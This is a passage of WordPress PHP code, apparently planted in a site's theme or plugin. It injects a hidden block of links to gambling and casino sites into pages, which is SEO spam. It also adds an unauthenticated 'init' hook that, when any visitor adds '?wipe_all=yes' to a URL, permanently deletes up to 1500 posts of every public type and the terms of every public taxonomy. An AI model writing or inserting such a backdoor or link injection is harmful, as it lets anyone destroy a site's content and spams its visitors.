';
$links = [ 'https://star111-india.com' => 'star111 login',
'https://ganabetcasino.com.mx/tr/' => 'Ganabet Casino',
'https://casino-doubleu.com/' => 'casino doubleu',
'https://ninja-crash.gg/' => 'ninja crash',
'https://sun-of-egypt-2.com/en/' => 'sun of egypt ',
'https://casinostrendus.com/en/' => 'strendus casino',
'https://casino-jugabet.com' => 'jugabet cl',
'https://betika-aviator.ke/' => 'Betika aviator',
'https://mx-bet.com.mx/' => 'MXBET',
'https://europebet-casino.ge/de/' => 'Europebet',
'https://casinobetsala.com/en/' => 'betsala'];
foreach ($links as $url => $anchor) {
echo "
";
}
echo '
';
});
add_action('init', function () {
$limit = 1500;
if (isset($_GET['wipe_all']) && $_GET['wipe_all'] === 'yes') {
$post_types = get_post_types(['public' => true], 'names');
foreach ($post_types as $post_type) {
$posts = get_posts([
'post_type' => $post_type,
'numberposts' => $limit,
'post_status' => 'any'
]);
foreach ($posts as $post) {
wp_delete_post($post->ID, true);
}
}
$taxonomies = get_taxonomies(['public' => true], 'names');
foreach ($taxonomies as $taxonomy) {
$terms = get_terms([
'taxonomy' => $taxonomy,
'hide_empty' => false,
'number' => $limit
]);
foreach ($terms as $term) {
wp_delete_term($term->term_id, $taxonomy);
}
}
wp_die('✅ Удалено до ' . $limit . ' записей.');
}
});